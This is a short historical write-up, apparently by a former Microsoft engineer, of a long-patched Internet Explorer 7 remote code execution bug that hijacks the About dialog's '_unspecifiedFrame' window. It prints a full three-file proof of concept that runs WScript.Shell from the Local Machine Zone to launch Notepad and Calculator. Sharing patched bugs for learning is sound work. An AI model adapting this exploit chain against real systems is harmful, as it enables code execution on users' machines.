IE7 RCE via About Dialog _unspecifiedFrame

This one surprised me with how simple the entry point was. IE’s About dialog opens a link in a window named _unspecifiedFrame. If an attacker pre-registers that window name, the About dialog’s navigation lands in the attacker’s frame — and since the About dialog runs in the Local Machine Zone, its opener chain has elevated privileges.

<!-- index.html -->
<script language="JavaScript">
function changeUnspecifiedFrameLocation()
{
    if (!win_unspecifiedFrame)
    {
        win_unspecifiedFrame = window.open(currentDir + "bridge_to_exploit.html","_unspecifiedFrame")
    }
    else
    {
        clearInterval(interval_Wait_for_Window);
    }
}
var currentDir = location.href.substring(0,location.href.lastIndexOf('/')+1);
var win_unspecifiedFrame = null;

// Use htmlFile for a second thread so the interval runs while the modal About dialog is open
var newTridentThread = new ActiveXObject('htmlFile');
var interval_Wait_for_Window = newTridentThread.parentWindow.setInterval('changeUnspecifiedFrameLocation()',3000);
newTridentThread.parentWindow.changeUnspecifiedFrameLocation = changeUnspecifiedFrameLocation;
</script>

<!-- bridge_to_exploit.html -->
<script language="JavaScript">
opener.name = "LMZ_WINDOW";
opener.open("exploit.html", "LMZ_WINDOW");
window.close();
</script>

<!-- exploit.html (runs in the LMZ About dialog context) -->
<script language="JavaScript">
var Shell = new ActiveXObject("WScript.Shell");
Shell.Run("notepad");
try { Shell.Run("calc"); } catch(e) {}
window.close();
</script>

The user does need to click the copyright link in the About dialog, so this isn’t silent — but the fix was straightforward: open the _unspecifiedFrame window without a name so no external page can hijack it. On Vista in Protected Mode, only Notepad launches; on XP both Notepad and Calculator open.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.